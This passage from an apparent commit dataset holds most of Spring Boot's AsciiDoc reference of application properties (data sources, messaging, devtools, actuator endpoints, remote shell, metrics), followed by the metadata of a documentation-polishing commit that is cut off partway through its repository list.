connection\n\tspring.jpa.open-in-view=true\n\tspring.jpa.show-sql=true\n\tspring.jpa.database-platform=\n\tspring.jpa.database=\n\tspring.jpa.generate-ddl=false # ignored by Hibernate, might be useful for other vendors\n\tspring.jpa.hibernate.naming-strategy= # naming classname\n\tspring.jpa.hibernate.ddl-auto= # defaults to create-drop for embedded dbs\n\tspring.data.jpa.repositories.enabled=true # if spring data repository support is enabled\n\n\t# JTA ({sc-spring-boot-autoconfigure}\/transaction\/jta\/JtaAutoConfiguration.{sc-ext}[JtaAutoConfiguration])\n\tspring.jta.log-dir= # transaction log dir\n\tspring.jta.*= # technology specific configuration\n\n\t# JOOQ ({sc-spring-boot-autoconfigure}\/jooq\/JooqAutoConfiguration.{sc-ext}[JooqAutoConfiguration])\n\tspring.jooq.sql-dialect=\n\n\t# ATOMIKOS\n\tspring.jta.atomikos.connectionfactory.borrow-connection-timeout=30 # Timeout, in seconds, for borrowing connections from the pool\n\tspring.jta.atomikos.connectionfactory.ignore-session-transacted-flag=true # Whether or not to ignore the transacted flag when creating session\n\tspring.jta.atomikos.connectionfactory.local-transaction-mode=false # Whether or not local transactions are desired\n\tspring.jta.atomikos.connectionfactory.maintenance-interval=60 # The time, in seconds, between runs of the pool's maintenance thread\n\tspring.jta.atomikos.connectionfactory.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool\n\tspring.jta.atomikos.connectionfactory.max-lifetime=0 # The time, in seconds, that a connection can be pooled for before being destroyed. 0 denotes no limit.\n\tspring.jta.atomikos.connectionfactory.max-pool-size=1 # The maximum size of the pool\n\tspring.jta.atomikos.connectionfactory.min-pool-size=1 # The minimum size of the pool\n\tspring.jta.atomikos.connectionfactory.reap-timeout=0 # The reap timeout, in seconds, for borrowed connections. 0 denotes no limit.\n\tspring.jta.atomikos.connectionfactory.unique-resource-name=jmsConnectionFactory # The unique name used to identify the resource during recovery\n\tspring.jta.atomikos.datasource.borrow-connection-timeout=30 # Timeout, in seconds, for borrowing connections from the pool\n\tspring.jta.atomikos.datasource.default-isolation-level= # Default isolation level of connections provided by the pool\n\tspring.jta.atomikos.datasource.login-timeout= # Timeout, in seconds, for establishing a database connection\n\tspring.jta.atomikos.datasource.maintenance-interval=60 # The time, in seconds, between runs of the pool's maintenance thread\n\tspring.jta.atomikos.datasource.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool\n\tspring.jta.atomikos.datasource.max-lifetime=0 # The time, in seconds, that a connection can be pooled for before being destroyed. 0 denotes no limit.\n\tspring.jta.atomikos.datasource.max-pool-size=1 # The maximum size of the pool\n\tspring.jta.atomikos.datasource.min-pool-size=1 # The minimum size of the pool\n\tspring.jta.atomikos.datasource.reap-timeout=0 # The reap timeout, in seconds, for borrowed connections. 0 denotes no limit.\n\tspring.jta.atomikos.datasource.test-query= # SQL query or statement used to validate a connection before returning it\n\tspring.jta.atomikos.datasource.unique-resource-name=dataSource # The unique name used to identify the resource during recovery\n\n\t# BITRONIX\n\tspring.jta.bitronix.connectionfactory.acquire-increment=1 # Number of connections to create when growing the pool\n\tspring.jta.bitronix.connectionfactory.acquisition-interval=1 # Time, in seconds, to wait before trying to acquire a connection again after an invalid connection was acquired\n\tspring.jta.bitronix.connectionfactory.acquisition-timeout=30 # Timeout, in seconds, for acquiring connections from the pool\n\tspring.jta.bitronix.connectionfactory.allow-local-transactions=true # Whether or not the transaction manager should allow mixing XA and non-XA transactions\n\tspring.jta.bitronix.connectionfactory.apply-transaction-timeout=false # Whether or not the transaction timeout should be set on the XAResource when it is enlisted\n\tspring.jta.bitronix.connectionfactory.automatic-enlisting-enabled=true # Whether or not resources should be enlisted and delisted automatically\n\tspring.jta.bitronix.connectionfactory.cache-producers-consumers=true # Whether or not produces and consumers should be cached\n\tspring.jta.bitronix.connectionfactory.defer-connection-release=true # Whether or not the provider can run many transactions on the same connection and supports transaction interleaving\n\tspring.jta.bitronix.connectionfactory.ignore-recovery-failures=false # Whether or not recovery failures should be ignored\n\tspring.jta.bitronix.connectionfactory.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool\n\tspring.jta.bitronix.connectionfactory.max-pool-size=10 # The maximum size of the pool. 0 denotes no limit\n\tspring.jta.bitronix.connectionfactory.min-pool-size=0 # The minimum size of the pool\n\tspring.jta.bitronix.connectionfactory.password= # The password to use to connect to the JMS provider\n\tspring.jta.bitronix.connectionfactory.share-transaction-connections=false # Whether or not connections in the ACCESSIBLE state can be shared within the context of a transaction\n\tspring.jta.bitronix.connectionfactory.test-connections=true # Whether or not connections should be tested when acquired from the pool\n\tspring.jta.bitronix.connectionfactory.two-pc-ordering-position=1 # The postion that this resource should take during two-phase commit (always first is Integer.MIN_VALUE, always last is Integer.MAX_VALUE)\n\tspring.jta.bitronix.connectionfactory.unique-name=jmsConnectionFactory # The unique name used to identify the resource during recovery\n\tspring.jta.bitronix.connectionfactory.use-tm-join=true Whether or not TMJOIN should be used when starting XAResources\n\tspring.jta.bitronix.connectionfactory.user= # The user to use to connect to the JMS provider\n\tspring.jta.bitronix.datasource.acquire-increment=1 # Number of connections to create when growing the pool\n\tspring.jta.bitronix.datasource.acquisition-interval=1 # Time, in seconds, to wait before trying to acquire a connection again after an invalid connection was acquired\n\tspring.jta.bitronix.datasource.acquisition-timeout=30 # Timeout, in seconds, for acquiring connections from the pool\n\tspring.jta.bitronix.datasource.allow-local-transactions=true # Whether or not the transaction manager should allow mixing XA and non-XA transactions\n\tspring.jta.bitronix.datasource.apply-transaction-timeout=false # Whether or not the transaction timeout should be set on the XAResource when it is enlisted\n\tspring.jta.bitronix.datasource.automatic-enlisting-enabled=true # Whether or not resources should be enlisted and delisted automatically\n\tspring.jta.bitronix.datasource.cursor-holdability= # The default cursor holdability for connections\n\tspring.jta.bitronix.datasource.defer-connection-release=true # Whether or not the database can run many transactions on the same connection and supports transaction interleaving\n\tspring.jta.bitronix.datasource.enable-jdbc4-connection-test= # Whether or not Connection.isValid() is called when acquiring a connection from the pool\n\tspring.jta.bitronix.datasource.ignore-recovery-failures=false # Whether or not recovery failures should be ignored\n\tspring.jta.bitronix.datasource.isolation-level= # The default isolation level for connections\n\tspring.jta.bitronix.datasource.local-auto-commit= # The default auto-commit mode for local transactions\n\tspring.jta.bitronix.datasource.login-timeout= # Timeout, in seconds, for establishing a database connection\n\tspring.jta.bitronix.datasource.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool\n\tspring.jta.bitronix.datasource.max-pool-size=10 # The maximum size of the pool. 0 denotes no limit\n\tspring.jta.bitronix.datasource.min-pool-size=0 # The minimum size of the pool\n\tspring.jta.bitronix.datasource.prepared-statement-cache-size=0 # The target size of the prepared statement cache. 0 disables the cache\n\tspring.jta.bitronix.datasource.share-transaction-connections=false # Whether or not connections in the ACCESSIBLE state can be shared within the context of a transaction\n\tspring.jta.bitronix.datasource.test-query= # SQL query or statement used to validate a connection before returning it\n\tspring.jta.bitronix.datasource.two-pc-ordering-position=1 # The position that this resource should take during two-phase commit (always first is Integer.MIN_VALUE, always last is Integer.MAX_VALUE)\n\tspring.jta.bitronix.datasource.unique-name=dataSource # The unique name used to identify the resource during recovery\n\tspring.jta.bitronix.datasource.use-tm-join=true Whether or not TMJOIN should be used when starting XAResources\n\n\t# SOLR ({sc-spring-boot-autoconfigure}\/solr\/SolrProperties.{sc-ext}[SolrProperties])\n\tspring.data.solr.host=http:\/\/127.0.0.1:8983\/solr\n\tspring.data.solr.zk-host=\n\tspring.data.solr.repositories.enabled=true # if spring data repository support is enabled\n\n\t# ELASTICSEARCH ({sc-spring-boot-autoconfigure}\/elasticsearch\/ElasticsearchProperties.{sc-ext}[ElasticsearchProperties])\n\tspring.data.elasticsearch.cluster-name= # The cluster name (defaults to elasticsearch)\n\tspring.data.elasticsearch.cluster-nodes= # The address(es) of the server node (comma-separated; if not specified starts a client node)\n\tspring.data.elasticsearch.properties.*= # Additional properties used to configure the client\n\tspring.data.elasticsearch.repositories.enabled=true # if spring data repository support is enabled\n\n\t# DATA REST ({spring-data-rest-javadoc}\/core\/config\/RepositoryRestConfiguration.{dc-ext}[RepositoryRestConfiguration])\n\tspring.data.rest.base-path= # base path against which the exporter should calculate its links\n\n\t# FLYWAY ({sc-spring-boot-autoconfigure}\/flyway\/FlywayProperties.{sc-ext}[FlywayProperties])\n\tflyway.*= # Any public property available on the auto-configured `Flyway` object\n\tflyway.check-location=false # check that migration scripts location exists\n\tflyway.locations=classpath:db\/migration # locations of migrations scripts\n\tflyway.schemas= # schemas to update\n\tflyway.init-version= 1 # version to start migration\n\tflyway.init-sqls= # SQL statements to execute to initialize a connection immediately after obtaining it\n\tflyway.sql-migration-prefix=V\n\tflyway.sql-migration-suffix=.sql\n\tflyway.enabled=true\n\tflyway.url= # JDBC url if you want Flyway to create its own DataSource\n\tflyway.user= # JDBC username if you want Flyway to create its own DataSource\n\tflyway.password= # JDBC password if you want Flyway to create its own DataSource\n\n\t# LIQUIBASE ({sc-spring-boot-autoconfigure}\/liquibase\/LiquibaseProperties.{sc-ext}[LiquibaseProperties])\n\tliquibase.change-log=classpath:\/db\/changelog\/db.changelog-master.yaml\n\tliquibase.check-change-log-location=true # check the change log location exists\n\tliquibase.contexts= # runtime contexts to use\n\tliquibase.default-schema= # default database schema to use\n\tliquibase.drop-first=false\n\tliquibase.enabled=true\n\tliquibase.url= # specific JDBC url (if not set the default datasource is used)\n\tliquibase.user= # user name for liquibase.url\n\tliquibase.password= # password for liquibase.url\n\n\t# JMX\n\tspring.jmx.default-domain= # JMX domain name\n\tspring.jmx.enabled=true # Expose MBeans from Spring\n\tspring.jmx.server=mbeanServer # MBeanServer bean name\n\n\t# RABBIT ({sc-spring-boot-autoconfigure}\/amqp\/RabbitProperties.{sc-ext}[RabbitProperties])\n\tspring.rabbitmq.addresses= # connection addresses (e.g. myhost:9999,otherhost:1111)\n\tspring.rabbitmq.dynamic=true # create an AmqpAdmin bean\n\tspring.rabbitmq.host= # connection host\n\tspring.rabbitmq.port= # connection port\n\tspring.rabbitmq.password= # login password\n\tspring.rabbitmq.requested-heartbeat= # requested heartbeat timeout, in seconds; zero for none\n\tspring.rabbitmq.ssl.enabled=false # enable SSL support\n\tspring.rabbitmq.ssl.key-store= # path to the key store that holds the SSL certificate\n\tspring.rabbitmq.ssl.key-store-password= # password used to access the key store\n\tspring.rabbitmq.ssl.trust-store= # trust store that holds SSL certificates\n\tspring.rabbitmq.ssl.trust-store-password= # password used to access the trust store\n\tspring.rabbitmq.username= # login user\n\tspring.rabbitmq.virtual-host= # virtual host to use when connecting to the broker\n\n\t# REDIS ({sc-spring-boot-autoconfigure}\/redis\/RedisProperties.{sc-ext}[RedisProperties])\n\tspring.redis.database= # database name\n\tspring.redis.host=localhost # server host\n\tspring.redis.password= # server password\n\tspring.redis.port=6379 # connection port\n\tspring.redis.pool.max-idle=8 # pool settings ...\n\tspring.redis.pool.min-idle=0\n\tspring.redis.pool.max-active=8\n\tspring.redis.pool.max-wait=-1\n\tspring.redis.sentinel.master= # name of Redis server\n\tspring.redis.sentinel.nodes= # comma-separated list of host:port pairs\n\tspring.redis.timeout= # connection timeout in milliseconds\n\n\t# ACTIVEMQ ({sc-spring-boot-autoconfigure}\/jms\/activemq\/ActiveMQProperties.{sc-ext}[ActiveMQProperties])\n\tspring.activemq.broker-url=tcp:\/\/localhost:61616 # connection URL\n\tspring.activemq.user=\n\tspring.activemq.password=\n\tspring.activemq.in-memory=true # broker kind to create if no broker-url is specified\n\tspring.activemq.pooled=false\n\n\t# ARTEMIS ({sc-spring-boot-autoconfigure}\/jms\/artemis\/ArtemisProperties.{sc-ext}[ArtemisProperties])\n\tspring.artemis.mode= # connection mode (native, embedded)\n\tspring.artemis.host=localhost # hornetQ host (native mode)\n\tspring.artemis.port=5445 # hornetQ port (native mode)\n\tspring.artemis.embedded.enabled=true # if the embedded server is enabled (needs hornetq-jms-server.jar)\n\tspring.artemis.embedded.server-id= # auto-generated id of the embedded server (integer)\n\tspring.artemis.embedded.persistent=false # message persistence\n\tspring.artemis.embedded.data-directory= # location of data content (when persistence is enabled)\n\tspring.artemis.embedded.queues= # comma-separated queues to create on startup\n\tspring.artemis.embedded.topics= # comma-separated topics to create on startup\n\tspring.artemis.embedded.cluster-password= # customer password (randomly generated by default)\n\n\t# HORNETQ ({sc-spring-boot-autoconfigure}\/jms\/hornetq\/HornetQProperties.{sc-ext}[HornetQProperties])\n\tspring.hornetq.mode= # connection mode (native, embedded)\n\tspring.hornetq.host=localhost # hornetQ host (native mode)\n\tspring.hornetq.port=5445 # hornetQ port (native mode)\n\tspring.hornetq.embedded.enabled=true # if the embedded server is enabled (needs hornetq-jms-server.jar)\n\tspring.hornetq.embedded.server-id= # auto-generated id of the embedded server (integer)\n\tspring.hornetq.embedded.persistent=false # message persistence\n\tspring.hornetq.embedded.data-directory= # location of data content (when persistence is enabled)\n\tspring.hornetq.embedded.queues= # comma-separated queues to create on startup\n\tspring.hornetq.embedded.topics= # comma-separated topics to create on startup\n\tspring.hornetq.embedded.cluster-password= # customer password (randomly generated by default)\n\n\t# JMS ({sc-spring-boot-autoconfigure}\/jms\/JmsProperties.{sc-ext}[JmsProperties])\n\tspring.jms.jndi-name= # JNDI location of a JMS ConnectionFactory\n\tspring.jms.pub-sub-domain= # false for queue (default), true for topic\n\n\t# Email ({sc-spring-boot-autoconfigure}\/mail\/MailProperties.{sc-ext}[MailProperties])\n\tspring.mail.host=smtp.acme.org # mail server host\n\tspring.mail.port= # mail server port\n\tspring.mail.username=\n\tspring.mail.password=\n\tspring.mail.default-encoding=UTF-8 # encoding to use for MimeMessages\n\tspring.mail.properties.*= # properties to set on the JavaMail session\n\tspring.mail.jndi-name= # JNDI location of a Mail Session\n\tspring.mail.test-connection=false # Test that the mail server is available on startup\n\n\t# SPRING BATCH ({sc-spring-boot-autoconfigure}\/batch\/BatchProperties.{sc-ext}[BatchProperties])\n\tspring.batch.job.names=job1,job2\n\tspring.batch.job.enabled=true\n\tspring.batch.initializer.enabled=true\n\tspring.batch.schema= # batch schema to load\n\tspring.batch.table-prefix= # table prefix for all the batch meta-data tables\n\n\t# SPRING CACHE ({sc-spring-boot-autoconfigure}\/cache\/CacheProperties.{sc-ext}[CacheProperties])\n\tspring.cache.type= # generic, ehcache, hazelcast, infinispan, jcache, redis, guava, simple, none\n\tspring.cache.cache-names= # cache names to create on startup\n\tspring.cache.ehcache.config= # location of the ehcache configuration\n\tspring.cache.hazelcast.config= # location of the hazelcast configuration\n\tspring.cache.infinispan.config= # location of the infinispan configuration\n\tspring.cache.jcache.config= # location of jcache configuration\n\tspring.cache.jcache.provider= # fully qualified name of the CachingProvider implementation to use\n\tspring.cache.guava.spec= # link:http:\/\/docs.guava-libraries.googlecode.com\/git\/javadoc\/com\/google\/common\/cache\/CacheBuilderSpec.html[guava specs]\n\n\t# AOP\n\tspring.aop.auto=\n\tspring.aop.proxy-target-class=\n\n\t# FILE ENCODING ({sc-spring-boot}\/context\/FileEncodingApplicationListener.{sc-ext}[FileEncodingApplicationListener])\n\tspring.mandatory-file-encoding= # Expected character encoding the application must use\n\n\t# SPRING SOCIAL ({sc-spring-boot-autoconfigure}\/social\/SocialWebAutoConfiguration.{sc-ext}[SocialWebAutoConfiguration])\n\tspring.social.auto-connection-views=true # Set to true for default connection views or false if you provide your own\n\n\t# SPRING SOCIAL FACEBOOK ({sc-spring-boot-autoconfigure}\/social\/FacebookAutoConfiguration.{sc-ext}[FacebookAutoConfiguration])\n\tspring.social.facebook.app-id= # your application's Facebook App ID\n\tspring.social.facebook.app-secret= # your application's Facebook App Secret\n\n\t# SPRING SOCIAL LINKEDIN ({sc-spring-boot-autoconfigure}\/social\/LinkedInAutoConfiguration.{sc-ext}[LinkedInAutoConfiguration])\n\tspring.social.linkedin.app-id= # your application's LinkedIn App ID\n\tspring.social.linkedin.app-secret= # your application's LinkedIn App Secret\n\n\t# SPRING SOCIAL TWITTER ({sc-spring-boot-autoconfigure}\/social\/TwitterAutoConfiguration.{sc-ext}[TwitterAutoConfiguration])\n\tspring.social.twitter.app-id= # your application's Twitter App ID\n\tspring.social.twitter.app-secret= # your application's Twitter App Secret\n\n\t# SPRING MOBILE SITE PREFERENCE ({sc-spring-boot-autoconfigure}\/mobile\/SitePreferenceAutoConfiguration.{sc-ext}[SitePreferenceAutoConfiguration])\n\tspring.mobile.sitepreference.enabled=true # enabled by default\n\n\t# SPRING MOBILE DEVICE VIEWS ({sc-spring-boot-autoconfigure}\/mobile\/DeviceDelegatingViewResolverAutoConfiguration.{sc-ext}[DeviceDelegatingViewResolverAutoConfiguration])\n\tspring.mobile.devicedelegatingviewresolver.enabled=true # disabled by default\n\tspring.mobile.devicedelegatingviewresolver.enable-fallback= # enable support for fallback resolution, default to false.\n\tspring.mobile.devicedelegatingviewresolver.normal-prefix=\n\tspring.mobile.devicedelegatingviewresolver.normal-suffix=\n\tspring.mobile.devicedelegatingviewresolver.mobile-prefix=mobile\/\n\tspring.mobile.devicedelegatingviewresolver.mobile-suffix=\n\tspring.mobile.devicedelegatingviewresolver.tablet-prefix=tablet\/\n\tspring.mobile.devicedelegatingviewresolver.tablet-suffix=\n\n\t# ----------------------------------------\n\t# DEVTOOLS PROPERTIES\n\t# ----------------------------------------\n\n # DEVTOOLS ({sc-spring-boot-devtools}\/autoconfigure\/DevToolsProperties.{sc-ext}[DevToolsProperties])\n spring.devtools.restart.enabled=true # enable automatic restart\n spring.devtools.restart.exclude= # patterns that should be excluding for triggering a full restart\n spring.devtools.restart.poll-interval= # amount of time (in milliseconds) to wait between polling for classpath changes\n spring.devtools.restart.quiet-period= # amount of quiet time (in milliseconds) required without any classpath changes before a restart is triggered\n spring.devtools.restart.trigger-file= # name of a specific file that when changed will trigger the restart\n\tspring.devtools.livereload.enabled=true # enable a livereload.com compatible server\n spring.devtools.livereload.port=35729 # server port.\n\n # REMOTE DEVTOOLS ({sc-spring-boot-devtools}\/autoconfigure\/RemoteDevToolsProperties.{sc-ext}[RemoteDevToolsProperties])\n spring.devtools.remote.context-path=\/.~~spring-boot!~ # context path used to handle the remote connection\n spring.devtools.remote.debug.enabled=true # enable remote debug support\n spring.devtools.remote.debug.local-port=8000 # local remote debug server port\n spring.devtools.remote.restart.enabled=true # enable remote restart\n spring.devtools.remote.secret= # a shared secret required to establish a connection\n spring.devtools.remote.secret-header-name=X-AUTH-TOKEN # HTTP header used to transfer the shared secret\n\n\t# ----------------------------------------\n\t# ACTUATOR PROPERTIES\n\t# ----------------------------------------\n\n\t# MANAGEMENT HTTP SERVER ({sc-spring-boot-actuator}\/autoconfigure\/ManagementServerProperties.{sc-ext}[ManagementServerProperties])\n\tmanagement.port= # defaults to 'server.port'\n\tmanagement.address= # bind to a specific NIC\n\tmanagement.context-path= # default to '\/'\n\tmanagement.add-application-context-header= # default to true\n\tmanagement.security.enabled=true # enable security\n\tmanagement.security.role=ADMIN # role required to access the management endpoint\n\tmanagement.security.sessions=stateless # session creating policy to use (always, never, if_required, stateless)\n\n\t# PID FILE ({sc-spring-boot-actuator}\/system\/ApplicationPidFileWriter.{sc-ext}[ApplicationPidFileWriter])\n\tspring.pid.file= # Location of the PID file to write\n\tspring.pid.fail-on-write-error= # Fail if the PID file cannot be written\n\n\t# ENDPOINTS ({sc-spring-boot-actuator}\/endpoint\/AbstractEndpoint.{sc-ext}[AbstractEndpoint] subclasses)\n\tendpoints.autoconfig.id=autoconfig\n\tendpoints.autoconfig.sensitive=true\n\tendpoints.autoconfig.enabled=true\n\tendpoints.beans.id=beans\n\tendpoints.beans.sensitive=true\n\tendpoints.beans.enabled=true\n\tendpoints.configprops.id=configprops\n\tendpoints.configprops.sensitive=true\n\tendpoints.configprops.enabled=true\n\tendpoints.configprops.keys-to-sanitize=password,secret,key,.*credentials.*,vcap_services # suffix or regex\n\tendpoints.dump.id=dump\n\tendpoints.dump.sensitive=true\n\tendpoints.dump.enabled=true\n\tendpoints.enabled=true # enable all endpoints\n\tendpoints.env.id=env\n\tendpoints.env.sensitive=true\n\tendpoints.env.enabled=true\n\tendpoints.env.keys-to-sanitize=password,secret,key,.*credentials.*,vcap_services # suffix or regex\n\tendpoints.health.id=health\n\tendpoints.health.sensitive=true\n\tendpoints.health.enabled=true\n\tendpoints.health.mapping.*= # mapping of health statuses to HttpStatus codes\n\tendpoints.health.time-to-live=1000\n\tendpoints.info.id=info\n\tendpoints.info.sensitive=false\n\tendpoints.info.enabled=true\n\tendpoints.logfile.path=\/logfile\n\tendpoints.logfile.sensitive=true\n\tendpoints.logfile.enabled=true\n\tendpoints.mappings.enabled=true\n\tendpoints.mappings.id=mappings\n\tendpoints.mappings.sensitive=true\n\tendpoints.metrics.id=metrics\n\tendpoints.metrics.sensitive=true\n\tendpoints.metrics.enabled=true\n\tendpoints.shutdown.id=shutdown\n\tendpoints.shutdown.sensitive=true\n\tendpoints.shutdown.enabled=false\n\tendpoints.trace.id=trace\n\tendpoints.trace.sensitive=true\n\tendpoints.trace.enabled=true\n\n\t# ENDPOINTS CORS CONFIGURATION ({sc-spring-boot-actuator}\/autoconfigure\/MvcEndpointCorsProperties.{sc-ext}[MvcEndpointCorsProperties])\n\tendpoints.cors.allow-credentials= # set whether user credentials are support. When not set, credentials are not supported.\n\tendpoints.cors.allowed-origins= # comma-separated list of origins to allow. * allows all origins. When not set, CORS support is disabled.\n\tendpoints.cors.allowed-methods= # comma-separated list of methods to allow. * allows all methods. When not set, defaults to GET.\n\tendpoints.cors.allowed-headers= # comma-separated list of headers to allow in a request. * allows all headers.\n\tendpoints.cors.exposed-headers= # comma-separated list of headers to include in a response.\n\tendpoints.cors.max-age=1800 # how long, in seconds, the response from a pre-flight request can be cached by clients.\n\n\t# HEALTH INDICATORS (previously health.*)\n\tmanagement.health.db.enabled=true\n\tmanagement.health.elasticsearch.enabled=true\n\tmanagement.health.elasticsearch.indices= # comma-separated index names\n\tmanagement.health.elasticsearch.response-timeout=100 # the time, in milliseconds, to wait for a response from the cluster\n\tmanagement.health.diskspace.enabled=true\n\tmanagement.health.diskspace.path=.\n\tmanagement.health.diskspace.threshold=10485760\n\tmanagement.health.jms.enabled=true\n\tmanagement.health.mail.enabled=true\n\tmanagement.health.mongo.enabled=true\n\tmanagement.health.rabbit.enabled=true\n\tmanagement.health.redis.enabled=true\n\tmanagement.health.solr.enabled=true\n\tmanagement.health.status.order=DOWN, OUT_OF_SERVICE, UNKNOWN, UP\n\n\t# MVC ONLY ENDPOINTS\n\tendpoints.jolokia.path=\/jolokia\n\tendpoints.jolokia.sensitive=true\n\tendpoints.jolokia.enabled=true # when using Jolokia\n\n\t# JMX ENDPOINT ({sc-spring-boot-actuator}\/autoconfigure\/EndpointMBeanExportProperties.{sc-ext}[EndpointMBeanExportProperties])\n\tendpoints.jmx.enabled=true # enable JMX export of all endpoints\n\tendpoints.jmx.domain= # the JMX domain, defaults to 'org.springboot'\n\tendpoints.jmx.unique-names=false\n\tendpoints.jmx.static-names=\n\n\t# JOLOKIA ({sc-spring-boot-actuator}\/autoconfigure\/JolokiaProperties.{sc-ext}[JolokiaProperties])\n\tjolokia.config.*= # See Jolokia manual\n\n\t# REMOTE SHELL\n\tshell.auth=simple # jaas, key, simple, spring\n\tshell.command-refresh-interval=-1\n\tshell.command-path-patterns= # classpath*:\/commands\/**, classpath*:\/crash\/commands\/**\n\tshell.config-path-patterns= # classpath*:\/crash\/*\n\tshell.disabled-commands=jpa*,jdbc*,jndi* # comma-separated list of commands to disable\n\tshell.disabled-plugins=false # don't expose plugins\n\tshell.ssh.enabled= # ssh settings ...\n\tshell.ssh.key-path=\n\tshell.ssh.port=\n\tshell.telnet.enabled= # telnet settings ...\n\tshell.telnet.port=\n\tshell.auth.jaas.domain= # authentication settings ...\n\tshell.auth.key.path=\n\tshell.auth.simple.user.name=\n\tshell.auth.simple.user.password=\n\tshell.auth.spring.roles=\n\n\t# METRICS EXPORT ({sc-spring-boot-actuator}\/metrics\/export\/MetricExportProperties.{sc-ext}[MetricExportProperties])\n\tspring.metrics.export.enabled=true # flag to disable all metric exports (assuming any MetricWriters are available)\n\tspring.metrics.export.delay-millis=5000 # delay in milliseconds between export ticks\n\tspring.metrics.export.send-latest=true # flag to switch off any available optimizations based on not exporting unchanged metric values\n\tspring.metrics.export.includes= # list of patterns for metric names to include\n\tspring.metrics.export.excludes= # list of patterns for metric names to exclude. Applied after the includes\n\tspring.metrics.export.redis.aggregate-key-pattern= # pattern that tells the aggregator what to do with the keys from the source repository\n\tspring.metrics.export.redis.prefix=spring.metrics # prefix for redis repository if active\n\tspring.metrics.export.redis.key=keys.spring.metrics # key for redis repository export (if active)\n\tspring.metrics.export.triggers.*= # specific trigger properties per MetricWriter bean name\n\n\t# SENDGRID ({sc-spring-boot-autoconfigure}\/sendgrid\/SendGridAutoConfiguration.{sc-ext}[SendGridAutoConfiguration])\n\tspring.sendgrid.username= # SendGrid account username\n\tspring.sendgrid.password= # SendGrid account password\n\tspring.sendgrid.proxy.host= # SendGrid proxy host\n\tspring.sendgrid.proxy.port= # SendGrid proxy port\n\n\t# GIT INFO\n\tspring.git.properties= # resource ref to generated git info properties file\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0e10dbc2691f40be2908409250e9cd28e21bf886","subject":"Polish documentation","message":"Polish documentation\n\nSome connection pool specific keys were still advertized in the\ndocumentation.\n","repos":"philwebb\/spring-boot-concourse,eddumelendez\/spring-boot,philwebb\/spring-boot,lucassaldanha\/spring-boot,jbovet\/spring-boot,habuma\/spring-boot,chrylis\/spring-boot,joshthornhill\/spring-boot,Buzzardo\/spring-boot,i007422\/jenkins2-course-spring-boot,aahlenst\/spring-boot,jbovet\/spring-boot,Nowheresly\/spring-boot,nebhale\/spring-boot,nebhale\/spring-boot,ilayaperumalg\/spring-boot,thomasdarimont\/spring-boot,jvz\/spring-boot,izeye\/spring-boot,vakninr\/spring-boot,minmay\/spring-boot,tiarebalbi\/spring-boot,michael-simons\/spring-boot,mosoft521\/spring-boot,ihoneymon\/spring-boot,afroje-reshma\/spring-boot-sample,cleverjava\/jenkins2-course-spring-boot,jxblum\/spring-boot,htynkn\/spring-boot,DeezCashews\/spring-boot,isopov\/spring-boot,aahlenst\/spring-boot,htynkn\/spring-boot,ptahchiev\/spring-boot,nebhale\/spring-boot,lburgazzoli\/spring-boot,philwebb\/spring-boot-concourse,royclarkson\/spring-boot,xiaoleiPENG\/my-project,linead\/spring-boot,zhanhb\/spring-boot,NetoDevel\/spring-boot,michael-simons\/spring-boot,lexandro\/spring-boot,eddumelendez\/spring-boot,jvz\/spring-boot,cleverjava\/jenkins2-course-spring-boot,i007422\/jenkins2-course-spring-boot,shakuzen\/spring-boot,mbogoevici\/spring-boot,tsachev\/spring-boot,olivergierke\/spring-boot,ollie314\/spring-boot,brettwooldridge\/spring-boot,philwebb\/spring-boot-concourse,scottfrederick\/spring-boot,qerub\/spring-boot,afroje-reshma\/spring-boot-sample,mbenson\/spring-boot,olivergierke\/spring-boot,spring-projects\/spring-boot,RichardCSantana\/spring-boot,kamilszymanski\/spring-boot,linead\/spring-boot,ilayaperumalg\/spring-boot,vakninr\/spring-boot,felipeg48\/spring-boot,drumonii\/spring-boot,candrews\/spring-boot,bclozel\/spring-boot,joshiste\/spring-boot,isopov\/spring-boot,bjornlindstrom\/spring-boot,minmay\/spring-boot,lexandro\/spring-boot,jmnarloch\/spring-boot,NetoDevel\/spring-boot,SaravananParthasarathy\/SPSDemo,ollie314\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,deki\/spring-boot,mbenson\/spring-boot,joshiste\/spring-boot,bjornlindstrom\/spring-boot,ilayaperumalg\/spring-boot,afroje-reshma\/spring-boot-sample,rweisleder\/spring-boot,candrews\/spring-boot,jmnarloch\/spring-boot,shangyi0102\/spring-boot,nebhale\/spring-boot,mbenson\/spring-boot,i007422\/jenkins2-course-spring-boot,thomasdarimont\/spring-boot,aahlenst\/spring-boot,ihoneymon\/spring-boot,hello2009chen\/spring-boot,philwebb\/spring-boot-concourse,felipeg48\/spring-boot,wilkinsona\/spring-boot,candrews\/spring-boot,shangyi0102\/spring-boot,kamilszymanski\/spring-boot,bclozel\/spring-boot,herau\/spring-boot,chrylis\/spring-boot,xiaoleiPENG\/my-project,isopov\/spring-boot,mbogoevici\/spring-boot,tsachev\/spring-boot,kamilszymanski\/spring-boot,shakuzen\/spring-boot,jxblum\/spring-boot,rweisleder\/spring-boot,linead\/spring-boot,Nowheresly\/spring-boot,eddumelendez\/spring-boot,lexandro\/spring-boot,javyzheng\/spring-boot,qerub\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,DeezCashews\/spring-boot,hqrt\/jenkins2-course-spring-boot,bijukunjummen\/spring-boot,izeye\/spring-boot,royclarkson\/spring-boot,mbenson\/spring-boot,Nowheresly\/spring-boot,scottfrederick\/spring-boot,tiarebalbi\/spring-boot,Buzzardo\/spring-boot,thomasdarimont\/spring-boot,lenicliu\/spring-boot,herau\/spring-boot,mbenson\/spring-boot,jxblum\/spring-boot,isopov\/spring-boot,felipeg48\/spring-boot,habuma\/spring-boot,neo4j-contrib\/spring-boot,hello2009chen\/spring-boot,SaravananParthasarathy\/SPSDemo,tsachev\/spring-boot,yhj630520\/spring-boot,bclozel\/spring-boot,sebastiankirsch\/spring-boot,joshthornhill\/spring-boot,drumonii\/spring-boot,i007422\/jenkins2-course-spring-boot,bjornlindstrom\/spring-boot,michael-simons\/spring-boot,mosoft521\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,michael-simons\/spring-boot,jmnarloch\/spring-boot,bbrouwer\/spring-boot,isopov\/spring-boot,felipeg48\/spring-boot,vpavic\/spring-boot,tsachev\/s